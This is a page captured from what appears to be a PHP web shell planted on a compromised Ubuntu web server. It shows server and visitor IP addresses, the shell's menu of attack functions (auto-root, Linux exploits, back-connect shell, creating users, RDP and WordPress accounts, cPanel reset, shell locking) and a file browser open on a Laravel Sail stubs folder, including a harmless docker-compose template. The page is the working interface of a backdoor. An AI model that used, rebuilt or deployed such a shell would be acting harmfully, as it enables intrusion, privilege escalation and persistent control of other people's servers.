Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
nepalphd /
vendor /
laravel /
sail /
stubs /
[ HOME SHELL ]
Name
Size
Permission
Action
devcontainer.stub
637
B
-rwxrwxr-x
docker-compose.stub
846
B
-rwxrwxr-x
mailpit.stub
189
B
-rwxrwxr-x
mariadb.stub
675
B
-rwxrwxr-x
meilisearch.stub
428
B
-rwxrwxr-x
memcached.stub
132
B
-rwxrwxr-x
minio.stub
513
B
-rwxrwxr-x
mysql.stub
679
B
-rwxrwxr-x
pgsql.stub
649
B
-rwxrwxr-x
redis.stub
259
B
-rwxrwxr-x
selenium.stub
185
B
-rwxrwxr-x
soketi.stub
447
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : docker-compose.stub
# For more information: https://laravel.com/docs/sail services: laravel.test: build: context: ./vendor/laravel/sail/runtimes/8.2 dockerfile: Dockerfile args: WWWGROUP: '${WWWGROUP}' image: sail-8.2/app extra_hosts: - 'host.docker.internal:host-gateway' ports: - '${APP_PORT:-80}:80' - '${VITE_PORT:-5173}:${VITE_PORT:-5173}' environment: WWWUSER: '${WWWUSER}' LARAVEL_SAIL: 1 XDEBUG_MODE: '${SAIL_XDEBUG_MODE:-off}' XDEBUG_CONFIG: '${SAIL_XDEBUG_CONFIG:-client_host=host.docker.internal}' IGNITION_LOCAL_SITES_PATH: '${PWD}' volumes: - '.:/var/www/html' networks: - sail networks: sail: driver: bridge
Close